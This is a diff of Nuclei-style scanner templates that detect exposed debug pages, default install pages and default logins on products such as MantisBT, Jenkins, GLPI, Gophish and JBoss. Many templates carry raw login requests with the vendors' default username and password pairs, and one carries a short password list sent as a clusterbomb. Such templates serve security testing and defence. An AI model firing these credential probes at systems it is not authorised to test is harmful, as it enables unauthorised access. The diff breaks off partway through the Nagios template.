--git a/poc/debug/pyramid-debug-toolbar-9740.yaml b/poc/debug/pyramid-debug-toolbar-9740.yaml index ce56513a92..908273ad3f 100644 --- a/poc/debug/pyramid-debug-toolbar-9740.yaml +++ b/poc/debug/pyramid-debug-toolbar-9740.yaml @@ -1,5 +1,4 @@ id: pyramid-debug-toolbar - info: name: Pyramid Debug Toolbar author: geeknik @@ -8,12 +7,10 @@ info: reference: - https://github.com/Pylons/pyramid_debugtoolbar tags: pyramid,logs,exposure - requests: - method: GET path: - "{{BaseURL}}/_debug_toolbar/" - matchers-condition: and matchers: - type: word @@ -21,7 +18,6 @@ requests: - "Pyramid Debug Toolbar" - "Pyramid DebugToolbar" condition: and - - type: status status: - 200 diff --git a/poc/debug/rails-debug-mode-9807.yaml b/poc/debug/rails-debug-mode-9807.yaml index fe31371bfd..bde8cd12bd 100644 --- a/poc/debug/rails-debug-mode-9807.yaml +++ b/poc/debug/rails-debug-mode-9807.yaml @@ -1,17 +1,20 @@ id: rails-debug-mode + info: - name: Rails Debug Mode Enabled + name: Rails Debug Mode author: pdteam severity: medium - tags: logs,rails,exposure + tags: debug,rails,exposure + requests: - method: GET path: - - "{{BaseURL}}/1238a92f573a48e58d356c42ca2c9610" + - "{{BaseURL}}/{{randstr}}" + matchers: - type: word + part: body words: - "Rails.root:" - "Action Controller: Exception caught" - condition: and - part: body + condition: and \ No newline at end of file diff --git a/poc/debug/wamp-xdebug-detect-11101.yaml b/poc/debug/wamp-xdebug-detect-11101.yaml index 2f31f0a8c3..539a94654d 100644 --- a/poc/debug/wamp-xdebug-detect-11101.yaml +++ b/poc/debug/wamp-xdebug-detect-11101.yaml @@ -1,18 +1,14 @@ id: wamp-xdebug-detect - info: name: WAMP xdebug author: e_schultze_ severity: info - reference: - - https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py - tags: debug,config,wamp - + # Inspired on https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + # Goal: detect if xdebug.remote_connect_back is enabled requests: - method: GET path: - "{{BaseURL}}/?phpinfo=-1" - matchers: - type: word words: diff --git a/poc/debug/wordpress-debug-log-11258.yaml b/poc/debug/wordpress-debug-log-11258.yaml old mode 100644 new mode 100755 index 8b743b299e..2658a93803 --- a/poc/debug/wordpress-debug-log-11258.yaml +++ b/poc/debug/wordpress-debug-log-11258.yaml @@ -1,25 +1,43 @@ id: wp-debug-log info: name: WordPress debug log - author: geraldino2,dwisiswant0 + author: + - l0ne1y + description: |- + WordPress debug log 调试信息泄漏漏洞 + WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 + WordPress debug log存储了wordpress运行中的调试信息,泄漏后容易被攻击者发现服务器相关信息。 severity: low - tags: wordpress,log + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.com + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/debug.log" - matchers-condition: and - matchers: - - type: word - words: - - octet-stream - - text/plain - part: header - condition: or - - type: regex - regex: - - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" - part: body - - type: status - status: - - 200 +- matchers: + - type: word + condition: or + part: header + words: + - octet-stream + - text/plain + - type: regex + part: body + regex: + - '[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/wp-content/debug.log' + method: GET diff --git a/poc/debug/yii-debugger-11740.yaml b/poc/debug/yii-debugger-11740.yaml index 062b2d6696..1cd703fc93 100644 --- a/poc/debug/yii-debugger-11740.yaml +++ b/poc/debug/yii-debugger-11740.yaml @@ -2,9 +2,8 @@ id: yii-debugger info: name: View Yii Debugger Information author: geeknik + reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ severity: low - reference: - - https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ tags: yii,debug,exposure requests: - method: GET diff --git a/poc/default/Mantis-Default_login.yaml b/poc/default/Mantis-Default_login.yaml new file mode 100644 index 0000000000..4ffeb88644 --- /dev/null +++ b/poc/default/Mantis-Default_login.yaml @@ -0,0 +1,46 @@ +id: mantisbt-default-credential + +info: + name: MantisBT Default Admin Login + author: For3stCo1d + severity: high + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + metadata: + shodan-query: title:"MantisBT" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: mantisbt,default-login + +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + return=index.php&username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - administrator + pass: + - root + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'mantis_secure_session') + - contains(tolower(all_headers), 'mantis_string_cookie') + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/22 diff --git a/poc/default/default-apache2-page-6806.yaml b/poc/default/default-apache2-page-6806.yaml index 001fda6ecd..074ad94a7d 100644 --- a/poc/default/default-apache2-page-6806.yaml +++ b/poc/default/default-apache2-page-6806.yaml @@ -3,8 +3,8 @@ info: name: Apache2 Default Test Page author: dhiyaneshDk severity: info - metadata: - shodan-query: http.title:"Apache2 Debian Default Page:" + reference: + - https://www.shodan.io/search?query=http.title%3A%22Apache2+Debian+Default+Page%3A+It+works%22 tags: tech,apache requests: - method: GET diff --git a/poc/default/default-detect-generic-6838.yaml b/poc/default/default-detect-generic-6838.yaml index 974585c135..2ff5c46a41 100644 --- a/poc/default/default-detect-generic-6838.yaml +++ b/poc/default/default-detect-generic-6838.yaml @@ -3,8 +3,8 @@ id: default-detect-generic info: name: Default Web Application Detection author: andydoering - description: Catch-all for detecting default installations of web applications using common phrases found in default install pages severity: info + description: Catch-all for detecting default installations of web applications using common phrases found in default install pages tags: tech requests: diff --git a/poc/default/default-fastcgi-page-6845.yaml b/poc/default/default-fastcgi-page-6845.yaml index f6cff4f009..afc17463fe 100644 --- a/poc/default/default-fastcgi-page-6845.yaml +++ b/poc/default/default-fastcgi-page-6845.yaml @@ -1,4 +1,5 @@ id: default-fastcgi-page + info: name: Fastcgi Default Test Page author: dhiyaneshDk @@ -6,6 +7,7 @@ info: reference: - https://www.shodan.io/search?query=http.title%3A%22FastCGI%22 tags: tech,fastcgi + requests: - method: GET path: diff --git a/poc/default/default-fedora-page-6850.yaml b/poc/default/default-fedora-page-6850.yaml index 95f6ad2dd7..9ba13abe80 100644 --- a/poc/default/default-fedora-page-6850.yaml +++ b/poc/default/default-fedora-page-6850.yaml @@ -1,11 +1,13 @@ id: default-fedora-page + info: name: Fedora Default Test Page author: dhiyaneshDk severity: info - metadata: - shodan-query: http.title:"Test Page for the HTTP Server on Fedora" + reference: + - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+HTTP+Server+on+Fedora%22 tags: tech,fedora + requests: - method: GET path: diff --git a/poc/default/default-glassfish-server-page-6853.yaml b/poc/default/default-glassfish-server-page-6853.yaml index 7b83998662..c35faab8aa 100644 --- a/poc/default/default-glassfish-server-page-6853.yaml +++ b/poc/default/default-glassfish-server-page-6853.yaml @@ -1,4 +1,5 @@ id: default-glassfish-server-page + info: name: GlassFish Server Default Page author: dhiyaneshDk @@ -6,6 +7,7 @@ info: reference: - https://www.shodan.io/search?query=http.title%3A%22GlassFish+Server+-+Server+Running%22 tags: tech,glassfish + requests: - method: GET path: diff --git a/poc/default/default-jetty-page-6862.yaml b/poc/default/default-jetty-page-6862.yaml index 40954ebd9c..9c2af86e22 100644 --- a/poc/default/default-jetty-page-6862.yaml +++ b/poc/default/default-jetty-page-6862.yaml @@ -1,12 +1,11 @@ id: default-jetty-page - info: name: Jetty Default Page author: dhiyaneshDk severity: info + metadata: + shodan-query: http.title:"Powered By Jetty" tags: tech,jetty - reference: https://www.shodan.io/search?query=http.title%3A%22Powered+By+Jetty%22 - requests: - method: GET path: diff --git a/poc/default/default-microsoft-azure-page-6873.yaml b/poc/default/default-microsoft-azure-page-6873.yaml index 0188209aab..543e5f393e 100644 --- a/poc/default/default-microsoft-azure-page-6873.yaml +++ b/poc/default/default-microsoft-azure-page-6873.yaml @@ -4,8 +4,9 @@ info: name: Microsoft Azure Default Page author: dhiyaneshDk severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22Microsoft+Azure+App+Service+-+Welcome%22 tags: tech,azure,microsoft - reference: https://www.shodan.io/search?query=http.title%3A%22Microsoft+Azure+App+Service+-+Welcome%22 requests: - method: GET diff --git a/poc/default/default-movable-page-6878.yaml b/poc/default/default-movable-page-6878.yaml index 1c0d65d0b6..9009bf9781 100644 --- a/poc/default/default-movable-page-6878.yaml +++ b/poc/default/default-movable-page-6878.yaml @@ -1,11 +1,13 @@ id: default-movable-page + info: name: Movable Default Page author: dhiyaneshDk severity: info - metadata: - shodan-query: title:"Welcome to Movable Type" tags: tech,movable + metadata: + shodan-query: 'title:"Welcome to Movable Type"' + requests: - method: GET path: diff --git a/poc/default/default-openresty-6884.yaml b/poc/default/default-openresty-6884.yaml index 401ac8779f..cfe73c1a3a 100644 --- a/poc/default/default-openresty-6884.yaml +++ b/poc/default/default-openresty-6884.yaml @@ -1,12 +1,11 @@ id: default-openresty - info: name: OpenResty Default Page author: dhiyaneshDk severity: info - tags: tech,openrestry - reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22 - + reference: + - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22 + tags: tech,openresty requests: - method: GET path: diff --git a/poc/default/default-payara-server-page-6895.yaml b/poc/default/default-payara-server-page-6895.yaml index 97088404d7..4908cc038a 100644 --- a/poc/default/default-payara-server-page-6895.yaml +++ b/poc/default/default-payara-server-page-6895.yaml @@ -1,15 +1,18 @@ id: default-payara-server-page + info: name: Payara Server Default Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Payara+Server+-+Server+Running%22 + metadata: + shodan-query: http.title:"Payara Server - Server Running" tags: tech,payara + requests: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/poc/default/dolphinscheduler-default-login-7073.yaml b/poc/default/dolphinscheduler-default-login-7073.yaml index c77249a51f..139ea8c34e 100644 --- a/poc/default/dolphinscheduler-default-login-7073.yaml +++ b/poc/default/dolphinscheduler-default-login-7073.yaml @@ -1,18 +1,20 @@ id: dolphinscheduler-default-login + info: name: Apache DolphinScheduler Default Login author: For3stCo1d - severity: high description: Apache DolphinScheduler default admin credentials were discovered. - reference: - - https://github.com/apache/dolphinscheduler + severity: high + reference: https://github.com/apache/dolphinscheduler + metadata: + shodan-query: http.title:"DolphinScheduler" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.title:"DolphinScheduler" tags: apache,dolphinscheduler,default-login,oss + requests: - raw: - | @@ -21,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded userName={{user}}&userPassword={{pass}} + attack: pitchfork payloads: user: - admin pass: - dolphinscheduler123 + matchers-condition: and matchers: - type: word @@ -35,6 +39,7 @@ requests: - '"msg":"login success"' - '"sessionId":' condition: and + - type: status status: - 200 diff --git a/poc/default/druid-default-login-7096.yaml b/poc/default/druid-default-login-7096.yaml index 4dd778392e..78d252b867 100644 --- a/poc/default/druid-default-login-7096.yaml +++ b/poc/default/druid-default-login-7096.yaml @@ -1,13 +1,10 @@ id: druid-default-login info: - name: Apache Druid Default Login + name: Druid Default Login author: pikpikcu severity: high - description: Apache Druid default login information (admin/admin) was discovered. tags: druid,default-login - classification: - cwe-id: CWE-798 requests: - raw: @@ -39,6 +36,4 @@ requests: - type: regex regex: - - "^success$" - -# Enhanced by mp on 2022/03/03 + - "^success$" \ No newline at end of file diff --git a/poc/default/dvwa-default-login-7127.yaml b/poc/default/dvwa-default-login-7127.yaml index 8a0518f83e..fdf974e494 100644 --- a/poc/default/dvwa-default-login-7127.yaml +++ b/poc/default/dvwa-default-login-7127.yaml @@ -1,4 +1,5 @@ id: dvwa-default-login + info: name: DVWA Default Login author: pdteam @@ -9,6 +10,7 @@ info: classification: cwe-id: CWE-798 tags: dvwa,default-login + requests: - raw: - | @@ -16,6 +18,7 @@ requests: Host: {{Hostname}} Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close + - | POST /login.php HTTP/1.1 Host: {{Hostname}} @@ -24,12 +27,14 @@ requests: Connection: close username={{username}}&password={{password}}&Login=Login&user_token={{token}} + payloads: username: - admin password: - password attack: pitchfork + extractors: - type: regex name: token @@ -38,12 +43,14 @@ requests: part: body regex: - "hidden' name='user_token' value='([0-9a-z]+)'" + - type: kval name: session internal: true part: body kval: - PHPSESSID + redirects: true matchers: - type: word diff --git a/poc/default/emcecom-default-login-7211.yaml b/poc/default/emcecom-default-login-7211.yaml index 199ac75ebe..7ec4aff9bc 100644 --- a/poc/default/emcecom-default-login-7211.yaml +++ b/poc/default/emcecom-default-login-7211.yaml @@ -1,35 +1,43 @@ id: dell-emc-ecom-default-login + info: name: Dell EMC ECOM Default Login author: Techryptic (@Tech) severity: high description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered. - remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. - reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation - tags: dell,emc,ecom,default-login + reference: + - https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation classification: cwe-id: CWE-798 + remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. + If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. + tags: dell,emc,ecom,default-login + requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - root password: - calvin attack: pitchfork + matchers-condition: and matchers: - type: word words: - "Set-Cookie: ECOMSecurity" part: header + - type: word words: - "Welcome to ECOM" + - type: status status: - 200 diff --git a/poc/default/flir-default-login-7513.yaml b/poc/default/flir-default-login-7513.yaml index d0b0b99721..13dbeca242 100644 --- a/poc/default/flir-default-login-7513.yaml +++ b/poc/default/flir-default-login-7513.yaml @@ -6,9 +6,9 @@ info: description: Flir default login credentials (admin/admin) were discovered. reference: - https://securitycamcenter.com/flir-default-password/ - tags: default-login,flir,camera,iot classification: cwe-id: CWE-798 + tags: default-login,flir,camera,iot requests: - raw: - | diff --git a/poc/default/fuelcms-default-login-7572.yaml b/poc/default/fuelcms-default-login-7572.yaml index 9a64ca8b8c..c46140539c 100644 --- a/poc/default/fuelcms-default-login-7572.yaml +++ b/poc/default/fuelcms-default-login-7572.yaml @@ -1,33 +1,34 @@ id: fuelcms-default-login + info: - name: Fuel CMS - Default Admin Discovery + name: Fuel CMS Default Credentials author: Adam Crosser severity: high description: Fuel CMS default admin credentials were discovered. reference: - https://docs.getfuelcms.com/general/security - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: fuelcms,default-login,oss + requests: - raw: - | GET /fuel/login HTTP/1.1 Host: {{Hostname}} + - | POST /fuel/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user_name={{username}}&password={{password}}&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}} + attack: pitchfork payloads: username: - admin password: - admin + cookie-reuse: true matchers-condition: and matchers: @@ -35,13 +36,16 @@ requests: part: header words: - "/fuel/dashboard" + - type: regex part: header regex: - 'fuel_(.*)=' + - type: status status: - 302 + extractors: - type: regex part: body @@ -50,5 +54,3 @@ requests: group: 1 regex: - 'id="ci_csrf_token_FUEL" value="([0-9a-z]+)" \/>' - -# Enhanced by mp on 2022/07/15 diff --git a/poc/default/geoserver-default-login-7593.yaml b/poc/default/geoserver-default-login-7593.yaml index 0c98134403..8a9e8d01ec 100644 --- a/poc/default/geoserver-default-login-7593.yaml +++ b/poc/default/geoserver-default-login-7593.yaml @@ -1,4 +1,5 @@ id: geoserver-default-login + info: name: Geoserver Default Admin Login author: For3stCo1d @@ -6,14 +7,14 @@ info: description: Geoserver default admin credentials were discovered. reference: - http://geoserver.org/ - metadata: - fofa-query: app="GeoServer" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + fofa-query: app="GeoServer" tags: geoserver,default-login + requests: - raw: - | @@ -22,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}} + attack: pitchfork payloads: user: - admin pass: - geoserver + matchers-condition: and matchers: - type: dsl @@ -35,6 +38,7 @@ requests: - "contains(tolower(location), '/geoserver/web')" - "!contains(tolower(location), 'error=true')" condition: and + - type: status status: - 302 diff --git a/poc/default/glpi-default-login-7733.yaml b/poc/default/glpi-default-login-7733.yaml index c2ea4c26d7..63857480c0 100644 --- a/poc/default/glpi-default-login-7733.yaml +++ b/poc/default/glpi-default-login-7733.yaml @@ -1,19 +1,18 @@ id: glpi-default-login - info: name: GLPI Default Login author: andysvints severity: high tags: glpi,default-login - description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. + description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. reference: https://glpi-project.org/ - + classification: + cwe-id: CWE-798 requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /front/login.php HTTP/1.1 Host: {{Hostname}} @@ -22,14 +21,12 @@ requests: Referer: {{BaseURL}} {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} - attack: pitchfork payloads: user: - glpi pass: - glpi - extractors: - type: regex name: token @@ -38,7 +35,6 @@ requests: group: 1 regex: - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\"" - - type: regex name: name part: body @@ -46,7 +42,6 @@ requests: group: 1 regex: - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" - - type: regex name: password part: body @@ -54,14 +49,14 @@ requests: group: 1 regex: - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" - cookie-reuse: true matchers-condition: and matchers: - type: word words: - 'GLPI - Standard Interface' - - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/poc/default/gophish-default-login-7794.yaml b/poc/default/gophish-default-login-7794.yaml index 9b2b924bb1..2bea18c8ad 100644 --- a/poc/default/gophish-default-login-7794.yaml +++ b/poc/default/gophish-default-login-7794.yaml @@ -1,31 +1,33 @@ id: gophish-default-login - info: - name: Gophish < v0.10.1 default credentials + name: Gophish < v0.10.1 Default Credentials author: arcc,dhiyaneshDK severity: high + description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary. + reference: + - https://docs.getgophish.com/user-guide/getting-started + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: gophish,default-login - requests: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} - - | POST /login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}} - attack: pitchfork payloads: user: - admin pass: - gophish - cookie-reuse: true extractors: - type: regex @@ -35,7 +37,6 @@ requests: group: 1 regex: - 'name="csrf_token" value="(.+?)"' - matchers: - type: dsl dsl: @@ -43,4 +44,6 @@ requests: - "contains(tolower(all_headers), 'location: /')" - "contains(tolower(all_headers), 'gophish')" - "status_code==302" - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/hp-switch-default-login-8036.yaml b/poc/default/hp-switch-default-login-8036.yaml index 22810268d6..6142cb38aa 100644 --- a/poc/default/hp-switch-default-login-8036.yaml +++ b/poc/default/hp-switch-default-login-8036.yaml @@ -1,11 +1,17 @@ id: hp-switch-default-login info: - name: HP 1820-8G Switch J9979A Default Credential + name: HP 1820-8G Switch J9979A Default Login author: pussycat0x severity: high - reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US + description: HP 1820-8G Switch J9979A default admin login credentials were discovered. + reference: + - https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: - fofa-query: 'HP 1820-8G Switch J9979A' + fofa-query: HP 1820-8G Switch J9979A tags: default-login,hp requests: - raw: @@ -27,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/default/idemia-biometrics-default-login-8138.yaml b/poc/default/idemia-biometrics-default-login-8138.yaml index 05a7f16fbf..1a7ffa1347 100644 --- a/poc/default/idemia-biometrics-default-login-8138.yaml +++ b/poc/default/idemia-biometrics-default-login-8138.yaml @@ -2,14 +2,9 @@ id: idemia-biometrics-default-login info: name: IDEMIA BIOMetrics Default Login author: Techryptic (@Tech) - severity: medium - description: IDEMIA BIOMetrics application default login credentials were discovered. - reference: - - https://www.google.com/search?q=idemia+password%3D+"12345" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 + severity: high + description: Default Login of password=12345 on IDEMIA BIOMetrics application. + reference: https://www.google.com/search?q=idemia+password%3D+"12345" tags: idemia,biometrics,default-login requests: - raw: @@ -36,5 +31,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/default/jenkins-default-8271.yaml b/poc/default/jenkins-default-8271.yaml index 33df9a1c9b..46dc1296db 100644 --- a/poc/default/jenkins-default-8271.yaml +++ b/poc/default/jenkins-default-8271.yaml @@ -1,35 +1,44 @@ id: jenkins-weak-password info: - name: Jenkins Default Login + name: Jenkins Weak Password author: Zandros0 severity: high - description: Jenkins default admin login information was discovered. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: jenkins,default-login requests: - raw: - | - GET / HTTP/1.1 + GET /login HTTP/1.1 Host: {{Hostname}} - | POST /j_spring_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded + Cookie: {{cookie}} - j_username=admin&j_password=admin&from=%2F&Submit=Sign+in + j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in - | GET / HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true + Cookie: {{cookie}} + attack: pitchfork + payloads: + username: + - admin + - jenkins + password: + - admin + - password + extractors: + - type: regex + name: cookie + internal: true + part: header + regex: + - 'JSESSIONID\..*=([a-z0-9.]+)' req-condition: true matchers: - type: dsl + condition: and dsl: - 'contains(body_3, "/logout")' - 'contains(body_3, "Dashboard [Jenkins]")' - condition: and - -# Enhanced by mp on 2022/03/10 diff --git a/poc/default/jmx-default-login-8354.yaml b/poc/default/jmx-default-login-8354.yaml index 84d0053092..de4e66a812 100644 --- a/poc/default/jmx-default-login-8354.yaml +++ b/poc/default/jmx-default-login-8354.yaml @@ -1,23 +1,18 @@ id: jmx-default-login + info: - name: JBoss JMX Console Weak Credential Discovery - description: JBoss JMX Console default login information was discovered. + name: JBoss JMX Console Weak Credential author: paradessia severity: high tags: jboss,jmx,default-login - reference: - - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + requests: - raw: - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(user + ':' + pass)}} + attack: clusterbomb payloads: user: @@ -31,13 +26,13 @@ requests: - 123456789 - 123qwe - root + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'JMImplementation' - -# Enhanced by mp on 2022/03/10 diff --git a/poc/default/jupyterhub-default-login-8400.yaml b/poc/default/jupyterhub-default-login-8400.yaml index fa7f7c44b0..eb6153750b 100644 --- a/poc/default/jupyterhub-default-login-8400.yaml +++ b/poc/default/jupyterhub-default-login-8400.yaml @@ -1,15 +1,18 @@ id: jupyterhub-default-login - info: - name: Jupyterhub Default Login + name: Jupyterhub - Default Admin Discovery author: For3stCo1d severity: high + description: Jupyterhub default admin credentials were discovered. reference: - https://github.com/jupyterhub/jupyterhub + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: http.title:"JupyterHub" tags: jupyterhub,default-login - requests: - raw: - | @@ -18,7 +21,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}} - attack: pitchfork payloads: user: @@ -27,7 +29,6 @@ requests: pass: - admin - jupyter - matchers-condition: and matchers: - type: dsl @@ -35,7 +36,8 @@ requests: - contains(tolower(all_headers), 'jupyterhub-session-id=') - contains(tolower(all_headers), 'jupyterhub-hub-login=') condition: and - - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/default/kafka-center-default-login-8416.yaml b/poc/default/kafka-center-default-login-8416.yaml index dc906bae8a..6de21b6717 100644 --- a/poc/default/kafka-center-default-login-8416.yaml +++ b/poc/default/kafka-center-default-login-8416.yaml @@ -1,18 +1,21 @@ id: kafka-center-default-login + info: name: Apache Kafka Center Default Login author: dhiyaneshDK severity: high + tags: kafka,default-login description: Apache Kafka Center default admin credentials were discovered. reference: - https://developer.ibm.com/tutorials/kafka-authn-authz/ + metadata: + shodan-query: http.title:"Kafka Center" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.title:"Kafka Center" - tags: kafka,default-login + requests: - raw: - | @@ -21,19 +24,23 @@ requests: Content-Type: application/json {"name":"{{username}}","password":"{{password}}","checkbox":false} + attack: pitchfork payloads: username: - admin password: - admin + matchers-condition: and matchers: + - type: word words: - '"code":200' - '"name":"admin"' condition: and + - type: status status: - 200 diff --git a/poc/default/lighttpd-default-8627.yaml b/poc/default/lighttpd-default-8627.yaml index 9038df8198..910c5f5d10 100644 --- a/poc/default/lighttpd-default-8627.yaml +++ b/poc/default/lighttpd-default-8627.yaml @@ -1,14 +1,17 @@ id: lighttpd-default + info: name: lighttpd Default Page author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22 - tags: tech + tags: tech,lighttpd + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word diff --git a/poc/default/lutron-iot-default-login-8677.yaml b/poc/default/lutron-iot-default-login-8677.yaml index aa05f20cc8..6938c769b9 100644 --- a/poc/default/lutron-iot-default-login-8677.yaml +++ b/poc/default/lutron-iot-default-login-8677.yaml @@ -1,4 +1,5 @@ id: lutron-iot-default-login + info: name: Lutron IOT Device Default Login author: geeknik @@ -6,10 +7,12 @@ info: reference: - https://www.lutron.com tags: iot,default-login,lutron,panel + requests: - method: GET path: - "{{BaseURL}}/login?login=lutron&password=lutron" + matchers-condition: and matchers: - type: word @@ -18,10 +21,12 @@ requests: - ">DeviceIP" - ">Get Database Info as XML" condition: and + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/poc/default/nagios-default-login-8994.yaml b/poc/default/nagios-default-login-8994.yaml index e1982ba865..3672516797 100644 --- a/poc/default/nagios-default-login-8994.yaml +++ b/poc/default/nagios-default-login-8994.yaml @@ -1,16 +1,25 @@ id: nagios-default-login + info: name: Nagios Default Login - author: d3sca + author: iamthefrogy severity: high + description: Nagios default admin credentials were discovered. + reference: + - https://www.nagios.org + classification: + cvss-metrics: 